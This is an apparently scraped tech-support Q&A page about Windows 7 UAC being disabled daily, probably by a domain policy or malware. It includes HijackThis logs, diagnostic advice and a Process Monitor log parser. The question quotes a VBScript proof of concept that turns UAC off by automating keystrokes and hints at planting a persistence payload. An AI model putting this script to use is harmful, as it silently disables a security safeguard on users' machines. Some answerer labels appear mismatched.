virus - UAC being turned off once a day on Windows 7

07
2014-07
  • Questioner

    I have a strange problem on my HP laptop. This began to happen recently. Whenever I start my machine, Windows 7 Action Center displays the following warning:

    You need to restart your computer for UAC to be turned off.

    Actually, this does not happen if it happened once on a specific day. For example, when I start the machine in the morning, it shows up; but it never shows up in the subsequent restarts within that day. On the next day, the same thing happens again.

    I never disable UAC, but obviously some rootkit or virus causes this. As soon as I get this warning, I head for the UAC settings, and re-enable UAC to dismiss this warning. This is a bothersome situation as I can't fix it.

    First, I have run a full scan on the computer for any probable virus and malware/rootkit activity, but TrendMicro OfficeScan said that no viruses have been found. I went to an old Restore Point using Windows System Restore, but the problem was not solved.

    What I have tried so far (which couldn't find the rootkit):

    • TrendMicro OfficeScan Antivirus
    • AVAST
    • Malwarebytes' Anti-malware
    • Ad-Aware
    • Vipre Antivirus
    • GMER
    • TDSSKiller (Kaspersky Labs)
    • HiJackThis
    • RegRuns
    • UnHackMe
    • SuperAntiSpyware Portable
    • Tizer Rootkit Razor (*)
    • Sophos Anti-Rootkit
    • SpyHunter 4
    • ComboFix

    There are no other strange activities on the machine. Everything works fine except this bizarre incident.

    What could be the name of this annoying rootkit? How can I detect and remove it?


    EDIT: Below is the log file generated by HijackThis:

    Logfile of Trend Micro HijackThis v2.0.4
    Scan saved at 13:07:04, on 17.01.2011
    Platform: Windows 7  (WinNT 6.00.3504)
    MSIE: Internet Explorer v8.00 (8.00.7600.16700)
    Boot mode: Normal
    
    Running processes:
    C:\Windows\system32\taskhost.exe
    C:\Windows\system32\Dwm.exe
    C:\Windows\Explorer.EXE
    C:\Program Files\CheckPoint\SecuRemote\bin\SR_GUI.Exe
    C:\Windows\System32\igfxtray.exe
    C:\Windows\System32\hkcmd.exe
    C:\Windows\system32\igfxsrvc.exe
    C:\Windows\System32\igfxpers.exe
    C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
    C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
    C:\Program Files\Analog Devices\Core\smax4pnp.exe
    C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\VolCtrl.exe
    C:\Program Files\LightningFAX\LFclient\lfsndmng.exe
    C:\Program Files\Common Files\Java\Java Update\jusched.exe
    C:\Program Files\Microsoft Office Communicator\communicator.exe
    C:\Program Files\Iron Mountain\Connected BackupPC\Agent.exe
    C:\Program Files\Trend Micro\OfficeScan Client\PccNTMon.exe
    C:\Program Files\Microsoft LifeCam\LifeExp.exe
    C:\Program Files\Hewlett-Packard\Shared\HpqToaster.exe
    C:\Program Files\Windows Sidebar\sidebar.exe
    C:\Program Files\mimio\mimio Studio\system\aps_tablet\atwtusb.exe
    C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE
    C:\Program Files\Babylon\Babylon-Pro\Babylon.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    C:\Users\userx\Desktop\HijackThis.exe
    
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = http://www.yaysat.com.tr/proxy/proxy.pac
    R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
    O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
    O2 - BHO: Babylon IE plugin - {9CFACCB6-2F3F-4177-94EA-0D2B72D384C1} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll
    O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
    O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe
    O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe
    O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe
    O4 - HKLM\..\Run: [hpWirelessAssistant] C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
    O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    O4 - HKLM\..\Run: [QlbCtrl.exe] C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
    O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
    O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
    O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
    O4 - HKLM\..\Run: [lfsndmng] C:\Program Files\LightningFAX\LFclient\LFSNDMNG.EXE
    O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
    O4 - HKLM\..\Run: [Communicator] "C:\Program Files\Microsoft Office Communicator\communicator.exe" /fromrunkey
    O4 - HKLM\..\Run: [AgentUiRunKey] "C:\Program Files\Iron Mountain\Connected BackupPC\Agent.exe" -ni -sss -e http://localhost:16386/
    O4 - HKLM\..\Run: [OfficeScanNT Monitor] "C:\Program Files\Trend Micro\OfficeScan Client\pccntmon.exe" -HideWindow
    O4 - HKLM\..\Run: [Babylon Client] C:\Program Files\Babylon\Babylon-Pro\Babylon.exe -AutoStart
    O4 - HKLM\..\Run: [LifeCam] "C:\Program Files\Microsoft LifeCam\LifeExp.exe"
    O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
    O4 - Global Startup: mimio Studio.lnk = C:\Program Files\mimio\mimio Studio\mimiosys.exe
    O8 - Extra context menu item: Microsoft Excel'e &Ver - res://C:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE/3000
    O8 - Extra context menu item: Translate this web page with Babylon - res://C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/ActionTU.htm
    O8 - Extra context menu item: Translate with Babylon - res://C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/Action.htm
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~1\Office12\REFIEBAR.DLL
    O9 - Extra button: Translate this web page with Babylon - {F72841F0-4EF1-4df5-BCE5-B3AC8ACF5478} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll
    O9 - Extra 'Tools' menuitem: Translate this web page with Babylon - {F72841F0-4EF1-4df5-BCE5-B3AC8ACF5478} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll
    O16 - DPF: {00134F72-5284-44F7-95A8-52A619F70751} (ObjWinNTCheck Class) - https://172.20.12.103:4343/officescan/console/html/ClientInstall/WinNTChk.cab
    O16 - DPF: {08D75BC1-D2B5-11D1-88FC-0080C859833B} (OfficeScan Corp Edition Web-Deployment SetupCtrl Class) - https://172.20.12.103:4343/officescan/console/html/ClientInstall/setup.cab
    O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = yaysat.com
    O17 - HKLM\Software\..\Telephony: DomainName = yaysat.com
    O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = yaysat.com
    O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = yaysat.com
    O18 - Protocol: qcom - {B8DBD265-42C3-43E6-B439-E968C71984C6} - C:\Program Files\Common Files\Quest Shared\CodeXpert\qcom.dll
    O22 - SharedTaskScheduler: FencesShellExt - {1984DD45-52CF-49cd-AB77-18F378FEA264} - C:\Program Files\Stardock\Fences\FencesMenu.dll
    O23 - Service: Andrea ADI Filters Service (AEADIFilters) - Andrea Electronics Corporation - C:\Windows\system32\AEADISRV.EXE
    O23 - Service: AgentService - Iron Mountain Incorporated - C:\Program Files\Iron Mountain\Connected BackupPC\AgentService.exe
    O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - LSI Corporation - C:\Program Files\LSI SoftModem\agrsmsvc.exe
    O23 - Service: BMFMySQL - Unknown owner - C:\Program Files\Quest Software\Benchmark Factory for Databases\Repository\MySQL\bin\mysqld-max-nt.exe
    O23 - Service: Com4QLBEx - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
    O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
    O23 - Service: OfficeScanNT RealTime Scan (ntrtscan) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\ntrtscan.exe
    O23 - Service: SMS Task Sequence Agent (smstsmgr) - Unknown owner - C:\Windows\system32\CCM\TSManager.exe
    O23 - Service: Check Point VPN-1 Securemote service (SR_Service) - Check Point Software Technologies - C:\Program Files\CheckPoint\SecuRemote\bin\SR_Service.exe
    O23 - Service: Check Point VPN-1 Securemote watchdog (SR_Watchdog) - Check Point Software Technologies - C:\Program Files\CheckPoint\SecuRemote\bin\SR_Watchdog.exe
    O23 - Service: Trend Micro Unauthorized Change Prevention Service (TMBMServer) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\..\BM\TMBMSRV.exe
    O23 - Service: OfficeScan NT Listener (tmlisten) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\tmlisten.exe
    O23 - Service: OfficeScan NT Proxy Service (TmProxy) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\TmProxy.exe
    O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe
    
    --
    End of file - 8204 bytes
    

    As suggested in this very similar question, I have run full scans (+boot time scans) with RegRun and UnHackMe, but they also did not find anything. I have carefully examined all entries in the Event Viewer, but there's nothing wrong.

    Now I know that there is a hidden trojan (rootkit) on my machine which seems to disguise itself quite successfully. Note that I don't have the chance to remove the HDD, or reinstall the OS as this is a work machine subjected to certain IT policies on a company domain.

    Despite all my attempts, the problem still remains. I strictly need a to-the-point method or a pukka rootkit remover to remove whatever it is. I don't want to monkey with the system settings, i.e. disabling auto runs one by one, messing the registry, etc.


    EDIT 2: I have found an article which is closely related to my trouble:

    Malware can turn off UAC in Windows 7; “By design” says Microsoft. Special thanks(!) to Microsoft.

    In the article, a VBScript code is given to disable UAC automatically:

    '// 1337H4x Written by _____________ 
    '//                    (12 year old)
    
    Set WshShell = WScript.CreateObject("WScript.Shell")
    
    '// Toggle Start menu
    WshShell.SendKeys("^{ESC}")
    WScript.Sleep(500)
    
    '// Search for UAC applet
    WshShell.SendKeys("change uac")
    WScript.Sleep(2000)
    
    '// Open the applet (assuming second result)
    WshShell.SendKeys("{DOWN}")
    WshShell.SendKeys("{DOWN}")
    WshShell.SendKeys("{ENTER}")
    WScript.Sleep(2000)
    
    '// Set UAC level to lowest (assuming out-of-box Default setting)
    WshShell.SendKeys("{TAB}")
    WshShell.SendKeys("{DOWN}")
    WshShell.SendKeys("{DOWN}")
    WshShell.SendKeys("{DOWN}")
    
    '// Save our changes
    WshShell.SendKeys("{TAB}")
    WshShell.SendKeys("{ENTER}")
    
    '// TODO: Add code to handle installation of rebound
    '// process to continue exploitation, i.e. place something
    '// evil in Startup folder
    
    '// Reboot the system
    '// WshShell.Run "shutdown /r /f"
    

    Unfortunately, that doesn't tell me how I can get rid of this malicious code running on my system.


    EDIT 3: Last night, I left the laptop open because of a running SQL task. When I came in the morning, I saw that UAC was turned off. So, I suspect that the problem is not related to startup. It is happening once a day for sure no matter if the machine is rebooted.


    EDIT 4: Today, I immediately started "Process Monitor" as soon as Windows was started to hopefully catch the guilty one (thanks to @harrymc for the idea). At 9:17, the UAC slider was slid to the bottom (Windows 7 Action Center gave the warning). I investigated all the registry actions between 9:16 and 9:18. I saved the Process Monitor log file (70MB containing only that 2-minute interval). There are lots of EnableLUA = 0 (and the other) entries. I'm posting the screenshots of the properties windows of the first 4 below. It says svchost.exe is doing this, and gives some thread and PID numbers. I don't know what I should infer about them:

    [Four screenshots: Process Monitor event properties windows]

  • Answers
  • Mehper C. Palavuzlar

    Because of the bounty I need to provide a new answer

    You should first check if the Security Center service can start, and if not - which one of its dependencies is to blame. Look also for error messages in the Event Viewer.

    If you have the feeling that your computer is infected, possible solutions may be:

    1. How to Repair Windows 7 System Files with System File Checker.
    2. Startup Repair: How To Easily Repair Windows 7 Boot Problems Using Startup Repair.
    3. The last resort is to reformat the hard disk and reinstall Windows.
      In your case, this might apply: Performing an HP System Recovery in Windows Vista.

    Just to remark that Windows is quite capable of destroying itself without any help, which is why Windows Update is more dangerous than any virus. Startup Repair may fix the problem in this case by reinitializing Windows, without requiring the applications to be reinstalled.

    If you really think the problem is rather that of a virus, and you wish to know more about what is happening on your computer, you will need to find out two things:

    1. What change is being done to your system,
    2. What program does this change.

    For the first one, if it is a registry change, then the key is probably HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, item EnableLUA, whose value is 0 for Disabling and 1 for Enabling.

    Once you have located the change being done to your system, you can use Process Monitor and its Enable Boot Logging option (see help) to log all accesses to the key.

    I would first boot in Safe mode, and see if this is also happening. If not, then another attack-vector is to use Autoruns to disable startup items in a binary search for the product (since this might be a legitimate product causing the problem, rather than a virus).
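An added example, not part of the original answer: once Process Monitor has captured the window in which UAC was switched off, the exported CSV can be reduced to the writes that matter and grouped by the process that made them. The function names, the sample rows and the two extra value names (`ConsentPromptBehaviorAdmin`, `PromptOnSecureDesktop`) are assumptions added here; the column layout is Process Monitor's default CSV export.

```python
import csv
import io
import re
from collections import Counter

# Key named in the answer above. The two extra value names are the other UAC
# settings stored in the same key (added here, not taken from the page).
UAC_KEY = r"hklm\software\microsoft\windows\currentversion\policies\system"
UAC_VALUES = {"enablelua", "consentpromptbehavioradmin", "promptonsecuredesktop"}

# Constructed sample rows in Process Monitor's default CSV column layout.
# For a real export, read the file with encoding="utf-8-sig" to drop the BOM.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"9:16:58.2 AM","explorer.exe","2204","RegQueryValue","HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
"9:17:02.1 AM","svchost.exe","1012","RegSetValue","HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin","SUCCESS","Type: REG_DWORD, Length: 4, Data: 0"
"9:17:02.1 AM","svchost.exe","1012","RegSetValue","HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA","SUCCESS","Type: REG_DWORD, Length: 4, Data: 0"
"9:17:02.3 AM","svchost.exe","1012","RegSetValue","HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA","SUCCESS","Type: REG_DWORD, Length: 4, Data: 0"
"9:17:40.0 AM","svchost.exe","1012","RegSetValue","HKLM\SOFTWARE\Example\Unrelated\EnableLUA","SUCCESS","Type: REG_DWORD, Length: 4, Data: 0"
"9:25:11.7 AM","dllhost.exe","4321","RegSetValue","HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
'''


def uac_writes(csv_text):
    """Return successful RegSetValue events that touch the UAC policy values."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        # Reads (RegQueryValue) and failed writes do not change the setting.
        if row["Operation"] != "RegSetValue" or row["Result"] != "SUCCESS":
            continue
        key, _, value = row["Path"].rpartition("\\")
        if key.lower() != UAC_KEY or value.lower() not in UAC_VALUES:
            continue
        data = re.search(r"Data:\s*(\d+)", row["Detail"])
        hits.append({
            "time": row["Time of Day"],
            "process": row["Process Name"],
            "pid": int(row["PID"]),
            "value": value,
            "data": int(data.group(1)) if data else None,
        })
    return hits


def uac_disablers(hits):
    """Count EnableLUA=0 writes per (process, PID): who turned UAC off."""
    return Counter(
        (h["process"], h["pid"])
        for h in hits
        if h["value"].lower() == "enablelua" and h["data"] == 0
    )


if __name__ == "__main__":
    hits = uac_writes(SAMPLE_CSV)
    for h in hits:
        print(f'{h["time"]}  {h["process"]}[{h["pid"]}]  {h["value"]} = {h["data"]}')
    for (proc, pid), n in uac_disablers(hits).most_common():
        print(f"UAC disabled by {proc} (PID {pid}): {n} write(s)")
```

When the writer is `svchost.exe`, as in the question's EDIT 4, the PID is the useful part: `tasklist /svc /fi "PID eq <pid>"` lists the services hosted in that instance, which narrows the search to a specific service.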

  • Bobby Alexander

    Option 1: Disable all programs in Startup. (Start > Run > Msconfig. Disable everything under startup).

    Option 2: Install AVAST home edition and schedule a boot time scan. Better yet, disconnect the hard disk from your machine and connect it to another one and scan it from there using AVAST.

    Option 3: Another option is to run HijackThis. Generate the report and share it here for analysis. http://free.antivirus.com/hijackthis/

  • Try to Disable UAC without Admin Rights

    In my case it was a domain policy that was being applied once per day. Same problem. Diagnosis was easier because UAC turning off occurred only when logging in to the domain, or connecting over VPN. Thus it was discovered that the domain policy included some script to turn UAC off. I contacted my system admins and they confirmed that. So you had better consult your domain administrators, or validate local profile policies and scripts if you are not in a domain.

  • Seasoned Advice (cooking)

    Before you move onto more complicated measures, please do install AVG Anti-Virus Free Edition 2011. Let it perform a whole computer scan. Recently, I've had a similar problem, and no other anti-virus programs but the aforementioned one could fix it with its Anti-Rootkit measures.


  • Related Question

    Windows 7 won't update
  • cab0lt

    My problem is that Windows 7 won't update - legal MSDN copy. It says: "the update service is not started", and if I start it, it immediately shuts itself down. There is nothing interesting to see in the Event Viewer: no fatals and no warnings, only start/stop events. I've got no clue where to start looking, so here's a HijackThis log:

    Logfile of Trend Micro HijackThis v2.0.3 (BETA)
    Scan saved at 18:34:05, on 7/02/2010
    Platform: Unknown Windows (WinNT 6.01.3504)
    MSIE: Internet Explorer v8.00 (8.00.7600.16385)
    Boot mode: Normal
    
    Running processes:
    C:\Windows\system32\taskhost.exe
    C:\Windows\system32\Dwm.exe
    C:\Windows\Explorer.EXE
    C:\Windows\PLFSetI.exe
    C:\Program Files\VMware\VMware Player\hqtray.exe
    C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
    C:\Program Files\Windows Live\Messenger\msnmsgr.exe
    C:\Program Files\Windows Sidebar\sidebar.exe
    C:\Program Files\Windows Live\Contacts\wlcomm.exe
    C:\Program Files\Skype\Phone\Skype.exe
    C:\Program Files\Skype\Plugin Manager\skypePM.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    C:\Program Files\TrendMicro\HiJackThis\HiJackThis.exe
    
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.be/
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
    R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
    O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
    O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll
    O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O4 - HKLM\..\Run: [PLFSetL] C:\Windows\\PLFSetL.exe
    O4 - HKLM\..\Run: [PLFSetI] C:\Windows\PLFSetI.exe
    O4 - HKLM\..\Run: [VMware hqtray] "C:\Program Files\VMware\VMware Player\hqtray.exe"
    O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir Desktop\avgnt.exe" /min
    O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
    O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
    O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
    O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
    O8 - Extra context menu item: E&xporteren naar Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
    O9 - Extra button: Verzenden naar OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
    O9 - Extra 'Tools' menuitem: Verz&enden naar 
    

  • Related Answers
  • Chris Tarazi
  • slhck

    The following is from Microsoft. The 1st solution fixed my problem:

    From the case log, I understand that the error code 80072EFE was received when trying to perform Windows Update. If there has been any misunderstanding, please let me know. I fully understand the inconvenience you have experienced. We will work together to resolve this issue through the course of the case. This issue can be caused by one of the following factors:

    1. The computer was attacked by viruses.
    2. Some background programs, such as antivirus programs or firewalls (especially CA Firewall), block access to the Windows Update site.
    3. Incorrect DNS Settings.

    We will address some of the more common causes of this issue. It is important that we attempt to connect to the Windows Update web site after each step to confirm whether the resolution has worked. This will prevent us from having to proceed with additional troubleshooting steps and provide us with valuable feedback to further develop our support resolutions for you and our future customers. Your assistance is greatly appreciated.

    Suggestion 1: Run the tool to clear spyware

    1. Download the file TDSSKiller.zip from the following link and save it on the Desktop.
    2. Double click TDSSKiller.zip to unzip the file.
    3. Double click TDSSKiller.exe to scan the system.
    4. Wait for the scan and disinfection process to complete.

    Please Note: The third-party product discussed here is manufactured by a company that is independent of Microsoft. We make no warranty, implied or otherwise, regarding this product's performance or reliability.

    Now try Windows Update to see if the issue has been resolved. Please let us know if this step has resolved it. If not, please proceed to the next step.

    Suggestion 2: Reset DNS Settings

    1. Click "Start", input "NCPA.CPL" (without quotation marks) to Start Search bar and press "Enter".
    2. Right-click the network connection and click "Properties". If you are prompted for an administrator password or confirmation, type the password or provide confirmation.
    3. Click to highlight "Internet Protocol Version 6 (TCP/IPv6)" and click "Properties".
    4. Check "Obtain an IP address automatically" and "Obtain DNS server address automatically".
    5. Click "OK".
    6. Click to highlight "Internet Protocol Version 4 (TCP/IPv4)" and click "Properties".
    7. Check "Obtain an IP address automatically" and "Obtain DNS server address automatically".
    8. Click "OK".
    9. Reboot the computer.

    Now try Windows Update again to check if the issue has been resolved. If not, please proceed to the next step.

    Suggestion 3: Disable firewalls or other Internet browser programs that can affect the Internet connection

    This issue could be caused by third party applications. Let's first try disabling or uninstalling any third party security applications you may have installed on the computer. Please be advised that this is for troubleshooting purposes only.

    Once we have resolved the issue, the applications should be re-enabled or reinstalled immediately. If the third party security application is determined to be the cause, please contact the vendor for assistance. You may have a different security application not listed below that could also be causing the issue. Even if the firewall has been running for some time without any problems, new updates may create issues.

    Here is a list of the most common security applications:

    • Symantec
    • Norton
    • McAfee
    • Zone Alarm
    • Panda Security
    • Kaspersky
    • Sophos Antivirus
    • Comodo Firewall
    • AntispamSniper
    • Webroot
    • Spy Sweeper
    • Accelerator
    • Spybot

    Once the third party security applications have been disabled or removed, please access the Windows Update web site again. If you encounter problems disabling these programs, we recommend completely uninstalling them while troubleshooting.

    Before uninstalling any application, please enable your Windows Firewall and ensure that you have the CDs or files needed to re-install the program.